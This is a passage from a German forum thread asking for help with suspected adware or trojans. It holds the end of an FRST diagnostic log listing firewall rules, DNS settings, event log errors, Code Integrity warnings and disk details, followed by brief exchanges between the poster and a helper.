2013-08-22 15:25 - 2017-05-21 20:57 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft 
ii\versions\base38996\sc2_x64.exe FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 
2070\Anno5.exe FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe FirewallRules: 
[{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) 
D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Wiederherstellungspunkte ========================= 19-05-2017 15:50:08 Geplanter Prüfpunkt 21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x1ba0 Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter 
Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471} Error: (05/21/2017 12:27:16 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/21/2017 12:24:29 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0xbd0 Startzeit der fehlerhaften Anwendung: 0x01d2d21c6c50fef8 Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: f582f64c-3373-478a-a15b-f929adac582c Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/20/2017 08:03:18 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0xde4 Startzeit der fehlerhaften Anwendung: 0x01d2d1935ab86bd9 Pfad der fehlerhaften 
Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: bce9150f-3248-4ead-8318-8150d1bf8130 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/20/2017 02:27:58 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x203c Startzeit der fehlerhaften Anwendung: 0x01d2d16481b9cf5d Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: 4df17c98-057f-4230-b052-4a764dc63e50 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/20/2017 10:19:14 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". 
Error: (05/20/2017 10:16:45 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0xe7c Startzeit der fehlerhaften Anwendung: 0x01d2d141696bf18e Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: 9853c85f-3fc8-4b95-b23c-2a10b9d919d4 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/19/2017 03:30:48 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511 Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0 Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000018da1b ID des fehlerhaften Prozesses: 0xe04 Startzeit der fehlerhaften Anwendung: 0x01d2d0a3e937c3db Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll Berichtskennung: 55771ade-ec8b-4200-84b1-9a5029b17a41 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/19/2017 03:29:12 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511 Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0 Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000018da1b ID des fehlerhaften Prozesses: 0x2788 Startzeit der fehlerhaften Anwendung: 0x01d2d0a3bfd8df47 Pfad der fehlerhaften Anwendung: C:\Program 
Files\Bitdefender\Bitdefender 2017\odslv.exe Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll Berichtskennung: e7f89512-ad7c-48f5-9beb-8270e1eacebe Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Systemfehler: ============= Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/21/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. 
Error: (05/21/2017 08:55:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (05/21/2017 08:55:17 PM) (Source: DCOM) (EventID: 10010) (User: Weltz) Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. 
Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/20/2017 02:27:55 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. 
CodeIntegrity: =================================== Date: 2017-05-21 20:59:59.585 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 20:59:59.549 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 20:55:53.503 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-05-21 20:48:35.581 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 17:35:59.505 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SysWOW64\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf32.dll that did not meet the Microsoft signing level requirements. 
Date: 2017-05-21 14:50:07.831 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 14:50:07.798 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 12:28:31.255 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-21 01:33:57.070 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-20 20:19:32.035 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. 
==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz Prozentuale Nutzung des RAM: 32% Installierter physikalischer RAM: 8127.12 MB Verfügbarer physikalischer RAM: 5480.82 MB Summe virtueller Speicher: 14527.12 MB Verfügbarer virtueller Speicher: 11585.11 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:237.69 GB) (Free:147.41 GB) NTFS Drive d: () (Fixed) (Total:931.51 GB) (Free:620.58 GB) NTFS Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=450 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08) Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ |
21.05.2017, 20:18 | #6 |
/// TB-Ausbilder | Trojan, adware or something else? Please take note of my instructions, especially point 6. |
21.05.2017, 20:25 | #7 |
| Trojan, adware or something else? Now once more, properly this time. Code:
